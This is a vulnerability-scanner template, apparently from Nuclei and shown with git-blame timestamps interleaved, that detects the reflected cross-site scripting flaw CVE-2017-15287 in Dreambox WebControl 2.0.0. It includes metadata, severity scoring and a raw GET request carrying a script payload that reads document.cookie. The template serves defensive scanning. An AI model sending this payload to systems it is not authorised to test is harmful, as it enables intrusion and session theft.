2022-01-15 20:35:33 +00:00
id : CVE-2017-15287
info :
2022-04-29 19:58:07 +00:00
name : Dreambox WebControl 2.0.0 - Cross-Site Scripting
2022-01-15 20:35:33 +00:00
author : pikpikcu
severity : medium
2022-04-29 19:58:07 +00:00
description : |
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-01-15 20:36:52 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-15 20:36:52 +00:00
cve-id : CVE-2017-15287
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00129
2024-03-23 09:28:19 +00:00
epss-percentile : 0.46737
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : bouqueteditor_project
product : bouqueteditor
2023-09-06 13:22:34 +00:00
framework : dreambox
2024-01-14 09:21:50 +00:00
tags : cve,cve2017,dreambox,edb,xss,bouqueteditor_project
2022-01-15 20:35:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-15 20:35:33 +00:00
- raw :
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers :
- type : word
words :
- 'Unknown command : <script>alert(document.cookie)</script>'
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950